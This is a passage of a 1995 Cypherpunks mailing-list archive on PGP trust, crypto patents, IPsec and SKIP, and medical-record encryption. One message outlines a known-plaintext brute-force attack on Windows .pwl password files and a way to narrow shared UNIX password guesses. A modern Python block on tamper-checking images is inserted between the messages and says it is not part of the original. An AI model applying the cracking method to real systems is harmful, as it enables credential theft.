http://www.tis.com/ | |3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2| |Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 | +--------------------------------------------------------------------------+ From cme at TIS.COM Wed Nov 29 09:07:15 1995 From: cme at TIS.COM (Carl Ellison) Date: Thu, 30 Nov 1995 01:07:15 +0800 Subject: The future will be easy to use In-Reply-To: <199511290808.AAA14767@netcom2.netcom.com> Message-ID: <9511291640.AA00683@tis.com> -----BEGIN PGP SIGNED MESSAGE----- >Date: Wed, 29 Nov 1995 00:10:16 -0800 >From: frantz at netcom.com (Bill Frantz) >It is hard to see how to record the information about how much I trust the >recipient's systems security. I don't see a computer-understandable way to do that either -- but you have provided an example of a human-readable way in your prior paragraph: > I just added a key to my key ring that I will >use for sending confidential data to a client site. I trust that no one can >access the secret key who is not also inside their firewall. However, the >key is on a multi-user system, so I do not trust that it is accessible to >only one person. Since the data I intend to send will be publicly >available inside the firewall, I don't have to trust more than the >firewall. You could sign a small message consisting of: a) that paragraph b) the subject public key (or its good-enough hash) c) your public key (or its good-enough hash) with your key and let that attribute declaration do the job. It would only be humans who could interpret it, but in the end it's humans who need to. The computer should be able to find and use (b) and (c) -- but leave the human to interpret (a).
I grant that they'd rather let the machine do the thinking for them, but that may not be possible -- especially at this time in the evolution of generally available security, before we learn patterns to codify in computer-understandable abbreviations. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme | |Trusted Information Systems, Inc. http://www.tis.com/ | |3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2| |Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 | +--------------------------------------------------------------------------+ From jamesd at echeque.com Wed Nov 29 09:09:34 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 30 Nov 1995 01:09:34 +0800 Subject: Elliptic curves, patent status? Message-ID: <199511291651.IAA20813@blob.best.net> At 05:16 PM 11/28/95 -0400, Michael Smith wrote: > > > I'm unclear about the patent status of elliptic curve > > > systems. Are they covered by the Diffie-Hellman patent? > > > That is, is the language of this patent broad enough to > > > cover _all_ public-key systems, regardless of their > > > mathematical basis? On Mon, 27 Nov 1995 23:16:10 -0800 jamesd at echeque.com wrote: > > No, but RSA will litigate you with the objective of > > inflicting extravagant legal costs regardless. At 08:13 AM 11/29/95 EST, Dan Bailey wrote: > Does the patent create any headaches for elliptic curve research or > publishing elliptic curve papers, or just for new products? Patents do not prohibit research -- Yet.
Patent law continues to be extravagantly reinterpreted from time to time, in a way that continually increases the power of the patent office and the power of the courts, but this creativity has not yet collided drastically with freedom of speech. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Wed Nov 29 09:34:57 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 30 Nov 1995 01:34:57 +0800 Subject: The future will be easy to use Message-ID: <199511291715.JAA04804@blob.best.net> >>At 01:03 PM 11/28/95 EST, Carl Ellison wrote: >>>That's true. What the user would have to see is some icon (or, for >>>text-bound folks, a temporary unique string) until the user chooses and >>>assigns the appropriate alias. That icon would have no meaning by itself. >>>It would acquire a meaning by being associated with some message or set of >>>messages: James A. Donald" >>Better method: Creator of the key names it At 10:55 AM 11/29/95 EST, Carl Ellison wrote: > it > might also be non-unique, making it worthless as an identifier. Then your database should detect this non-uniqueness, and qualify the displayed name with additional information, preferably additional information that helps you address the question of "Is this the same identity who has changed his key, or is it an accidental collision, or is it a malevolent spoof?" --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state.
| jamesd at echeque.com From jamesd at echeque.com Wed Nov 29 09:35:45 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 30 Nov 1995 01:35:45 +0800 Subject: The future will be easy to use Message-ID: <199511291715.JAA04769@blob.best.net> >James A. Donald writes >> Specs, anyone? > > I suggest a few requirements: > > Store the >keys, and information about the keys in a *real* database > ... At 09:31 AM 11/29/95 -0500, Jack P. Starrantino wrote: > Is this worth the complexity/cost? I'd have thought that the amount of > data involved would be small enough that index hashing would be > overkill, and I can't think of any operations that would require a full > up db engine. I think you envisage communicating with a few other revolutionaries, drug traffickers, etc, whereas I envisage a future where every man is his own bank and his own credit rating agency. More immediately, any extension to the web of trust to enable it to function for anything more interesting and important than logical-to-physical identity (and who gives a tinker's damn about logical-to-physical identity) will require a real database, or will be painful without a real database. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Wed Nov 29 09:39:56 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 30 Nov 1995 01:39:56 +0800 Subject: The future will be easy to use Message-ID: <199511291715.JAA04720@blob.best.net> At 09:20 AM 11/30/95 -0500, amp wrote: >unfortunately, it appears to me that if you _really_ want encryption >to be universal, it's gotta be done on windoze, it's gotta be >point-n-click and seamless to the mail application. Which, at present, means it's gotta be done on Pegasus.
--------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From Andrew_Barrett at checkfree.com Wed Nov 29 09:52:28 1995 From: Andrew_Barrett at checkfree.com (Andrew Barrett/CheckFree Corporation) Date: Thu, 30 Nov 1995 01:52:28 +0800 Subject: (cpx) Re:(fwd) Like FV with Crypto ... 'Cept Different ... Message-ID: <9511292039.AA0442@6thstreetcheckfree.com> Lucky writes (quoting propaganda forwarded to Punks by Robert): >> WebTrader can be used as a stand-alone Internet application or in >>conjunction with SBT's Pro Series 3.0i accounting software. WebTrader has a >>suggested retail price of $1,295. ^^^^^^^^^^^^^^^^ >They can't be serious. Why would you want to pay $1,300 for a payment >system, when you can get an Ecash merchant account for a fraction of what >Checkfree is charging? Not all merchants wishing to transact on the Web are as knowledgeable or sophisticated as the Punks on the different options. The offering includes a Web presence and payment processing, hassle free. No energy expenditure required. No need to develop an instant competency in electronic commerce. If a prospective web merchant has neither in place, I imagine the cost might be attractive. I also imagine that, like any other business in the world, SBT charges what they think the market will bear. Please note that CheckFree did not price the offering - they do the CC processing for SBT at some agreed upon cost to SBT. SBT sets the price for the offering in order to recover that cost, as well as their own, and establish some sort of margin. And by the way, I had nothing to do with project, so I beg you not to direct flames thisaway, should any decide flames are called for. Hey man, I just work here.... :) AJ. 
From perry at piermont.com Wed Nov 29 09:56:52 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 30 Nov 1995 01:56:52 +0800 Subject: NRL IPsec/IPv6 code Message-ID: <199511291742.MAA03253@jekyll.piermont.com> An early version of NRL's 4.4BSDlite based IPsec/IPv6 implementation is up on ftp.c2.org in an appropriately export controlled directory. This isn't an official distribution -- I'm just putting up the code I got because there has been some interest in it. I've been hacking it in to NetBSD of late. Perry From johnl at radix.net Wed Nov 29 10:15:27 1995 From: johnl at radix.net (John A. Limpert) Date: Thu, 30 Nov 1995 02:15:27 +0800 Subject: Who has the right to read your e-mail? Old hash, but I need to ask. Message-ID: <199511281601.LAA02857@saltmine.radix.net> At 06:58 AM 11/28/95 -0600, (Bill) wrote: >Who has the right to read your personal e-mail. >E-mail created at work? >E-mail downloaded at work? >E-mail stored on a PC at work? The December 1995 issue of Communications of the ACM (CACM) has several articles on e-mail privacy. Managing User Perceptions of Email Privacy Suzanne P. Weisband and Bruce A. Reinig The Ethical and Legal Quandary of Email Privacy Janice C. Sipior and Burke T. Ward -- John A. Limpert johnl at Radix.Net From hallam at w3.org Wed Nov 29 10:56:06 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 30 Nov 1995 02:56:06 +0800 Subject: Judge won't drop Netcom from suit In-Reply-To: <30BA3798.2781E494@pts.mot.com> Message-ID: <9511291823.AA26757@zorch.w3.org> The article looks like it was written from the scientologists' press release. The judgement was posted in alt.religion.scientology. The actual judgement was far from a success for the scientologists. Phill From EALLENSMITH at ocelot.Rutgers.EDU Wed Nov 29 11:05:49 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E.
ALLEN SMITH) Date: Thu, 30 Nov 1995 03:05:49 +0800 Subject: Medical Records Message-ID: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu> Here's something that may make attempts such as Clipper a bit harder to mandate, if this (non-escrowed, I believe) system becomes common. It should also provide some pressure for relaxation of ITAR. -Allen (c) 1995 Copyright Nando.net (c) 1995 Reuter Information Service [...] A security system developed at the University of California at San Francisco prevents unauthorized access to x-rays and other medical images transmitted via computer networks. A scientist described the system in a report prepared for a radiologists' convention here. [...] Stephen Wong, assistant professor of radiology and bioengineering, and colleagues developed the system for the picture archiving and communications system used at the university to store and transmit digitized medical images. He said the authenticity of the images as well as patient confidentiality must be protected. "We have to make sure that the digital information and images are not altered accidentally or surreptitiously," Wong said. "In addition, x-rays and other imaging studies are part of the patient's medical record and must be protected from unauthorized access." The system uses mathematical formulas or codes to scramble the images through encryption. It involves a "two-key" system -- one code enables public access but a second, private code is required to unscramble the information. The private code, known only to the individual to whom the information is transmitted, is 1,024 computer bits long, Wong said. In emergencies where fast transmission is needed, the unscrambled image is transmitted with a digital "fingerprint," a smaller code that assures the intended viewer that no one has altered the original image. Wong prepared his report for the annual meeting of the Radiological Society of North America. 
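The emergency mode the article above describes, a cleartext image sent with a digital "fingerprint", as an added example that is not part of the original message or of the UCSF system. It shows that a bare digest catches accidental corruption only, while a keyed fingerprint also catches deliberate alteration; HMAC-SHA-256 with a shared key is swapped in for the article's public-key scheme so the block runs on the standard library, and every name, key and byte string is constructed.

```python
"""Bare digest vs. keyed fingerprint on a cleartext image transfer.

Assumptions (not from the article): SHA-256 as the digest; HMAC-SHA-256
stands in for the system's public-key signature; all data is constructed.
"""
import hashlib
import hmac
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Transfer:
    patient_id: str
    image: bytes
    fingerprint: bytes


def framed(patient_id: str, image: bytes) -> bytes:
    # Length-prefix both fields so the fingerprint binds the image to one
    # patient record and bytes cannot slide across the field boundary.
    pid = patient_id.encode("utf-8")
    return (len(pid).to_bytes(4, "big") + pid
            + len(image).to_bytes(8, "big") + image)


def send_bare(patient_id: str, image: bytes) -> Transfer:
    digest = hashlib.sha256(framed(patient_id, image)).digest()
    return Transfer(patient_id, image, digest)


def verify_bare(t: Transfer) -> bool:
    expected = hashlib.sha256(framed(t.patient_id, t.image)).digest()
    return hmac.compare_digest(expected, t.fingerprint)


def send_keyed(key: bytes, patient_id: str, image: bytes) -> Transfer:
    tag = hmac.new(key, framed(patient_id, image), hashlib.sha256).digest()
    return Transfer(patient_id, image, tag)


def verify_keyed(key: bytes, t: Transfer) -> bool:
    expected = hmac.new(key, framed(t.patient_id, t.image),
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, t.fingerprint)


def flip_bit(t: Transfer) -> Transfer:
    """Accidental corruption: one bit changes, the fingerprint does not."""
    return replace(t, image=bytes([t.image[0] ^ 0x01]) + t.image[1:])


def alter_and_rehash(t: Transfer, new_image: bytes) -> Transfer:
    """Deliberate alteration by a party without the key: the image changes
    and the fingerprint is recomputed from public data alone."""
    digest = hashlib.sha256(framed(t.patient_id, new_image)).digest()
    return replace(t, image=new_image, fingerprint=digest)


def run_demo() -> dict:
    key = bytes(range(32))                      # constructed demo key
    image = b"CONSTRUCTED-IMAGE " + bytes(range(256))
    altered = image.replace(b"CONSTRUCTED", b"SUBSTITUTED")
    bare = send_bare("patient-0001", image)
    keyed = send_keyed(key, "patient-0001", image)
    return {
        "bare_clean": verify_bare(bare),
        "bare_bitflip": verify_bare(flip_bit(bare)),
        "bare_altered": verify_bare(alter_and_rehash(bare, altered)),
        "keyed_clean": verify_keyed(key, keyed),
        "keyed_bitflip": verify_keyed(key, flip_bit(keyed)),
        "keyed_altered": verify_keyed(key, alter_and_rehash(keyed, altered)),
        "keyed_relabelled": verify_keyed(
            key, replace(keyed, patient_id="patient-0002")),
    }


if __name__ == "__main__":
    for check, accepted in run_demo().items():
        print(f"{check:17s} accepted={accepted}")
```

The only check that accepts a modified image is the bare digest after deliberate alteration, which is why the fingerprint in a cleartext mode has to be signed or keyed rather than a plain hash.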
From EALLENSMITH at ocelot.Rutgers.EDU Wed Nov 29 11:07:04 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Thu, 30 Nov 1995 03:07:04 +0800 Subject: Harbinger (sp?) system Message-ID: <01HY7U5HY1WK8WYVEV@mbcl.rutgers.edu> Sorry if this question has been asked and I missed it, but does anyone know how their system works? Thanks, -Allen (c) 1995 Copyright Nando.net (c) 1995 Cox News Service ATLANTA (Nov 29, 1995 - 09:44 EST) -- Harbinger Corp. has announced new software aimed at making the Internet safe for commerce, a move that could dramatically reshape the small company. [...] TrustedLink, the product announced Tuesday but not available until next year, will let firms connect via the Net as well as through Harbinger networks, he said. From jamesd at echeque.com Wed Nov 29 11:13:43 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 30 Nov 1995 03:13:43 +0800 Subject: Elliptic curves, patent status? Message-ID: <199511290717.XAA29808@blob.best.net> At 05:16 PM 11/28/95 -0400, Michael Smith wrote: > > I'm unclear about the patent status of elliptic curve > systems. Are they covered by the Diffie-Hellman patent? > That is, is the language of this patent broad enough to > cover _all_ public-key systems, regardless of their > mathematical basis? No, but RSA will litigate you with the objective of inflicting extravagant legal costs regardless. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From blane at eskimo.com Wed Nov 29 11:14:20 1995 From: blane at eskimo.com (Brian Lane) Date: Thu, 30 Nov 1995 03:14:20 +0800 Subject: Inexpensive Crypto Boxes...
Message-ID: <199511290726.XAA17712@mail.eskimo.com> > It isn't likely to be worth doing this with a sony play-station; its DSP > capabilities are nothing special, and you're paying way too much for > irrelevant stuff like CD-ROMs, 3D accelerators, etc. For the same money I seem to remember a product from Sony last year that had a CDROM drive in it, a small LCD display, and a minimal keyboard. I think it was meant for reading encyclopedias or something. What would be cool would be a small device like this with a Magneto Optical drive in it. Generate yourself a large one-time pad and off you go... Or, you could have a secure messaging system (running a stripped down version of PGP) that could connect to a host via POP3 protocol (thru an internal modem of course) handle your mail, etc. Brian --------------------------------------------------------------------------- blane at eskimo.com | Electronics, Privacy, Raytracing. ftp://ftp.eskimo.com/~blane | Embedded Microprocessor Programmer http://www.eskimo.com/~blane | From jimbell at pacifier.com Wed Nov 29 11:18:45 1995 From: jimbell at pacifier.com (jim bell) Date: Thu, 30 Nov 1995 03:18:45 +0800 Subject: key for Alice as promised (not) Message-ID: >On Tue, 28 Nov 1995, Adam Hupp wrote: > >> >Can you imagine?? I'm simply not willing to fool myself into thinking >> >that I ahve security by posting a key and using PGP. >> >> Unless you can post some proof that PGP is insecure, stop insisting it is. > >PGP is really not the issue. The issue is more my security and the >environment that I use PGP in. I don't have a trusted machine to run PGP >on. Anyone who wants to can come up to machine and copy my secret keyring >or they can even watch me typing my password in. > >So, I don't fool myself, and I don't use PGP, except for things like >exchanging a one-time pad with someone when I've already sent the message >out across another delivery mechanism, like on a floppy delivered by >courier. > >Alice de 'nonymous ...
You're a bonehead. On the one hand, you FAIL to stop or dramatically reduce claimed spoofings of your notes by using PGP (which would almost certainly work perfectly for this limited purpose) yet you claim that you'll only trust PGP in a limited scenario of courier-delivered data! Talk about "penny-wise and pound foolish"! Wake up, idiot! The purpose of encryption and signing and such is to REDUCE problems, ideally to zero but if not to some adequately small value. To fail to use signing when there is no ongoing problem is risky; to not use signing when there is a serious continuing problem is downright lunatic. That sets up an irresolvable contradiction: On the one hand, you're willing to tolerate a continuing problem, yet on the other you claim that your standards are so high that you won't use a system unless the probability of security essentially precludes a loss of security. Now can you see why we're laughing? From Doug.Hughes at Eng.Auburn.EDU Wed Nov 29 11:29:47 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Thu, 30 Nov 1995 03:29:47 +0800 Subject: SKIP Source Release is out! In-Reply-To: <199511291534.KAA02780@jekyll.piermont.com> Message-ID: Perry sez: > >Tom Markson writes: >> Check out http://skip.incog.com. We've released the source to the SKIP >> key management and IP layer encryption package for SunOs 4.x. > >SKIP is a non-standard being pushed by Sun. > Correct me if I'm wrong, but isn't sun trying to make it a standard (in competition with Photuris) ? Can I also assume that the IPV6 stuff requires pretty extensive kernel mods?
(Not bad, but a very definite consideration) -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu Pro is to Con as progress is to congress From adam at lighthouse.homeport.org Wed Nov 29 11:31:34 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Thu, 30 Nov 1995 03:31:34 +0800 Subject: Medical Records In-Reply-To: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu> Message-ID: <199511291909.OAA16016@homeport.org> It seems that they use signatures & hashes; nice work, a good advance for medical records storage, but I'd ask how keys are managed, and also what prevents me exploiting the 'hash-only' mode of sending in what I'm claiming to be is an emergency. (Not that these invalidate the system; they're just interesting areas to work on.) E. ALLEN SMITH wrote: | "We have to make sure that the digital information and images are not | altered accidentally or surreptitiously," Wong said. "In addition, | x-rays and other imaging studies are part of the patient's medical | record and must be protected from unauthorized access." | | The system uses mathematical formulas or codes to scramble the images | through encryption. It involves a "two-key" system -- one code enables | public access but a second, private code is required to unscramble the | information. | | The private code, known only to the individual to whom the information | is transmitted, is 1,024 computer bits long, Wong said. | | In emergencies where fast transmission is needed, the unscrambled | image is transmitted with a digital "fingerprint," a smaller code that | assures the intended viewer that no one has altered the original | image. -- "It is seldom that liberty of any kind is lost all at once."
-Hume From frank at funcom.no Wed Nov 29 11:47:42 1995 From: frank at funcom.no (Frank Andrew Stevenson) Date: Thu, 30 Nov 1995 03:47:42 +0800 Subject: Microsoft weak encryption In-Reply-To: <199511291447.GAA19250@mail.eskimo.com> Message-ID: I have been able to verify the key generation for the .pwl file, and successfully decrypted one, the contents are really suited for a known plaintext attack as the first characters appear to be the USERNAME in capitals padded with 0x00 to a total field size of 20, I have written software to bruteforce this field, but without optimizing I have a running time of 130 hours (Pentium 66) An interesting observation: If the password is shared with a UNIX fileserver (8 letters) once the 32 bit RC4 key is found guessing the last 4 letters of the password will reveal the remaining letters. This will then greatly reduce the keyspace needed to crack the UNIX password (you need to guess the case of the password though - (2^8) ) > Peter Gutmann has an interesting article in sci.crypt, demonstrating how > weak Microsoft's encryption is with basic access control in Windows for > Workgroups (I'm assuming Win95 uses the same algorithm). Essentially, he > shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL > files. I think a t-shirt is definitely in order for this. > > Anyone up for writing some bruting code? > > Joel > #include E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key From Chris.Claborne at SanDiegoCA.ATTGIS.com Wed Nov 29 11:48:27 1995 From: Chris.Claborne at SanDiegoCA.ATTGIS.com (Chris Claborne) Date: Thu, 30 Nov 1995 03:48:27 +0800 Subject: San Diego Cpunks Physical Meeting Message-ID: <9511291918.AA11333@toad.com> San Diego Area CPUNKS symposium Thursday, December 7, 1995 Invitation to all Cypherpunks to join the San Diego crowd at "The Mission Cafe & Coffee Shop".
Get the latest update of Lance Cottrell's anonymous e-mail server, "mixmaster", exchange keys, and discuss other topical subjects. If you are in to what's happening on the list, encryption, privacy, The Mission is the place to be. Don't forget to bring your public key fingerprint and forms of identification. If you can figure out how to get it on the back of a business card, that would be cool. Drop me a note if you plan to attend. Place: The Mission Cafe & Coffee Shop 3795 Mission Bl in Mission Beach. 488-9060 Time:1800 Their Directions: 8 west to Mission Beach Ingram Exit Take west mission bay drive Go right on Mission Blvd. On the corner of San Jose and mission blvd. It is located between roller coaster and Garnett. It's kind of 40s looking building... funky looking (their description, not mine) They serve stuff to eat, coffee stuff, and beer. See you there! New guy, bring your fingerprint. 2 -- C -- ... __o .. -\<, Chris.Claborne at SanDiegoCA.ATTGIS.Com ...(*)/(*). CI$: 76340.2422 http://bordeaux.sandiegoca.attgis.com/ PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA Avail on Pub Key server. From perry at piermont.com Wed Nov 29 12:18:32 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 30 Nov 1995 04:18:32 +0800 Subject: SKIP Source Release is out! In-Reply-To: Message-ID: <199511291926.OAA03467@jekyll.piermont.com> Doug Hughes writes: > >Tom Markson writes: > >> Check out http://skip.incog.com. We've released the source to the SKIP > >> key management and IP layer encryption package for SunOs 4.x. > > > >SKIP is a non-standard being pushed by Sun. > > Correct me if I'm wrong, but isn't sun trying to make it a standard > (in competition with Photuris) ? The IETF has many sorts of standards. It explicitly has a way to standardize things that the IETF doesn't think are a good idea but which should have the ability to interoperate if you do them.
My opinion is that it is fairly clear that Photuris is the key management system people will be using, although it is going to have to evolve to work with a real network wide certificate database infrastructure. SKIP isn't going to be the standard. > Can I also assume that the IPV6 stuff requires pretty extensive kernel > mods? (Not bad, but a very definite consideration) IPSEC, SKIP, IPv6, etc., all require kernel mods. You can't help it. It's part of the IP stack, you know. BTW, IPv6 uses IPSEC, but IPSEC isn't only for IPv6 -- it's also usable in IPv4. We were careful about how we architected that. The NRL code implements IPsec for both v4 and for the v6 stack it comes with. In fact, the NRL code is primarily an IPv6 implementation -- they just implemented IPSEC as a side effect. Perry From master at internexus.net Wed Nov 29 12:22:34 1995 From: master at internexus.net (Laszlo Vecsey) Date: Thu, 30 Nov 1995 04:22:34 +0800 Subject: So easy... in the future. In-Reply-To: <9511291354.AA16998@sulphur.osf.org> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I've found mkpgp to be a very useful tool, and an easy to use add on for 'pine' and pgp. But for those that prefer a GUI E-Mail application, I think it would be great if Netscape were to integrate some more security in that portion of their navigator. Or perhaps a third party could add this in by creating a PGP 'Plugin' for Netscape...
From hallam at w3.org Wed Nov 29 12:22:49 1995 From: hallam at w3.org (hallam at w3.org) Date: Thu, 30 Nov 1995 04:22:49 +0800 Subject: Medical Records In-Reply-To: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu> Message-ID: <9511291929.AA01140@zorch.w3.org> Exactly! We need to point out that crypto is essential to protect us from criminals. Some criminals may use crypto technology, just as they use faxes and portable phones. But just because a portable phone could be used by a drug dealer does not mean they should be illegal. Jim Bidzos just pinned a rather cool poster to the wall of the 3rd floor coffee lounge here at MIT today. It has a woman on a phone labeled "escrow enabled" and then the spooks listening in from a post marked "escrow integrity center". The motto is "A good Marketing Agency Listens to its Customers - We Hear You!" Phill From vznuri at netcom.com Wed Nov 29 12:31:19 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 30 Nov 1995 04:31:19 +0800 Subject: Whitehouse PROFS email privacy case Message-ID: <199511291931.LAA02934@netcom13.netcom.com> this was a hot subject a long time ago on the list, here's a book with the scoop ------- Forwarded Message From: Phil Agre To: rre at weber.ucsd.edu Subject: PROFS Case: Book on White House e-mail Date: Wed, 22 Nov 1995 12:50:49 -0500 (EST) From: Eddie Becker Subject: PROFS Case: Book on White House e-mail NEW BOOK PROVIDES NARRATIVE ON PROFS CASE ALONG WITH REMARKABLE PRIMARY DOCUMENTS. Following Press Release 11/22/96 REVELATIONS FROM --WHITE HOUSE E-MAIL: THE TOP SECRET COMPUTER MESSAGES THE REAGAN/BUSH WHITE HOUSE TRIED TO DESTROY, Edited by Tom Blanton (New York: The New Press, 256 pp. plus 1.44 megabyte computer disk), distributed by W.W. Norton & Company.
For more information, contact: Tom Blanton (o) 202/994-7000, (h) 301/718-6543, nsarchiv at gwis2.circ.gwu.edu SECRET SUPPORT FOR SADDAM HUSSEIN Top Reagan administration officials, including Colin Powell, presided over covert intelligence support to Saddam Hussein during the Iran-Iraq War, including targeting information on Iranian civilian infrastructure for Saddam's SCUD missiles. In secret e-mail messages, National Security Council staffer William Cockell recommended -- and Deputy National Security Adviser Alton Keel agreed -- they cover-up the assistance to Saddam, because "it is difficult to characterize this as defensive assistance." [pp. 36-41] Subsequently, while Powell served as Deputy National Security Adviser in 1987, the Reagan administration discussed a "shopping list" of pro-Iraq actions in order to "stiffen them up." [pp.235-237] HELPING NORIEGA "CLEAN UP HIS IMAGE" Three months after Seymour Hersh and The New York Times exposed Manuel Noriega's involvement in drugrunning and murder, Noriega approached the National Security Council staff with an offer to assassinate the Nicaraguan Sandinista leadership. Oliver North relayed the offer to his boss, National Security Adviser John Poindexter, writing that "you will recall that over the years Manuel Noriega in Panama and I have developed a fairly good relationship." Poindexter replies, "I have nothing against him other than his illegal activities" and approves a North meeting with Noriega -- as does Secretary of State George Shultz. The bottom line? The White House agrees to help Noriega "clean up his image" in return for Panamanian sabotage operations against the Nicaraguan Sandinistas. [pp. 
23-25] THE WHITE HOUSE SENDS A COCAINE CONSPIRATOR TO CLUB FED Top Reagan administration officials from the White House, Pentagon, and Justice Department just said yes to a reduced prison sentence (in a minimum security facility) for a Honduran colonel and sometime CIA asset who was convicted of cocaine trafficking and conspiracy to assassinate the civilian president of Honduras, because otherwise the colonel might "start singing songs nobody wants to hear" about covert operations in Honduras. [pp. 42-48] SECRET DEALS WITH LOBBYISTS ON A CONTROVERSIAL CONGRESSIONAL VOTE The White House struck a secret deal with the American Israel Public Affairs Committee in the spring of 1986 to avoid an AWACS-style all-out battle on a Saudi arms deal vote, and in return got AIPAC's help on foreign aid funding and on the Iran- contra scandal. But National Security Council staffer Howard Teicher warned, "whatever one may think of the jewish leadership, the 'masses' are rarely if ever swayed by what the rational, reasonable leaders say. instead, it is the israel right or wrong demagogues at the grassroots level that will try to take advantage of the leadership's pusillanimity." [pp. 150-157] HIDDEN FAILURES OF THE POLYGRAPH (PRECURSORS OF ALDRICH AMES) According to the National Security Council's top counterintelligence official in 1985, career FBI agent David Major, two out of the 48 individuals indicted, arrested and/or convicted of espionage against the U.S. in the years 1975-85, had successfully deceived the CIA's favorite screening tool, the polygraph (lie detector) -- a 4% error rate. (Aldrich Ames subsequently beat the polygraph twice.) [p.220] ROSS PEROT'S EGO RIDES AGAIN Ross Perot "sandbagged" the Reagan White House at a 1986 Congressional hearing on the POW-MIA issue, according to the lead White House staffer on the issue, Col. Richard Childress, who also wrote, "he has played into Hanoi's hands for his ego and doesn't even know it." [p. 
162] MORE WHITE HOUSE E-MAIL STORIES * Then-Israeli Defense Minister Yitzhak Rabin personally arranged with Oliver North for secret shipments of captured PLO weapons to Central America in September 1986, with the approval of the National Security Adviser. Rabin also commented, according to North's e-mail, "at some length about his low opinion of our intel service [CIA] - both in terms of coverts ops and intelligence collecting," and promised "no more Pollards." [pp. 119-122] * The regular breakfast meetings in the Reagan administration of the National Security Adviser, the Secretary of State (George Shultz), and the Secretary of Defense (Caspar Weinberger) often degenerated into what staffers called "slugfests." p. 193 * Contrary to claims in a recent autobiography, National Security Adviser Robert McFarlane did not anticipate the collapse of the Soviet Union and craft U.S. policy accordingly to pressure the Soviets, rather, in his 1984 e-mail, McFarlane wrote "it will not change ideologically and therefore our task is to establish a basis for peaceful competition with them." p.189 * At the behest of Israeli Prime Minister Shimon Peres, Vice President George Bush proposed a "7-point peace plan" during a Middle East trip in 1986, only to have it shot down by White House and State Department opposition back in Washington. p. 200 * While serving as Deputy National Security Adviser to President Reagan in 1987, Colin Powell lived in an alarmed house at Fort McNair which "scared hell out of the family initially and then became amusing when the MPs assaulted the house every time the alarm misfired." p. 211 * White House staffers joked about CIA Director William Casey's renowned "mumbles," writing, "The last time he told Goldwater we were going to 'lay some mines in Nicaragua,' Goldwater thought he said we were going to 'pay some fines for some joggers.'" p. 
214 END - ------- End of Forwarded Message ------- End of Forwarded Message From Doug.Hughes at Eng.Auburn.EDU Wed Nov 29 12:34:44 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Thu, 30 Nov 1995 04:34:44 +0800 Subject: SKIP Source Release is out! In-Reply-To: <199511291926.OAA03467@jekyll.piermont.com> Message-ID: > >Doug Hughes writes: >> >Tom Markson writes: >> >> Check out http://skip.incog.com. We've released the source to the SKIP >> >> key management and IP layer encryption package for SunOs 4.x. >> > >> >SKIP is a non-standard being pushed by Sun. >> >> Correct me if I'm wrong, but isn't sun trying to make it a standard >> (in competetion with Photuris) ? > >The IETF has many sorts of standards. It explicitly has a way to >standardize things that the IETF doesn't think are a good idea but >which should have the ability to interoperate if you do them. > >My opinion is that it is fairly clear that Photuris is the key >management system people will be using, although it is going to have >to evolve to work with a real network wide certificate database >infrastructure. SKIP isn't going to be the standard. > >> Can I also assume that the IPV6 stuff requires pretty extensive kernel >> mods? (Not bad, but a very definite consideration) > >IPSEC, SKIP, IPv6, etc., all require kernel mods. You can't help >it. Its part of the IP stack, you know. > I knew it was a safe assumption. :) >BTW, IPv6 uses IPSEC, but IPSEC isn't only for IPv6 -- its also usable >in IPv4. We were careful about how we architected that. > >The NRL code implements IPsec for both v4 and for the v6 stack it >comes with. In fact, the NRL code is primarily an IPv6 implementation >-- they just implemented IPSEC as a side effect. 
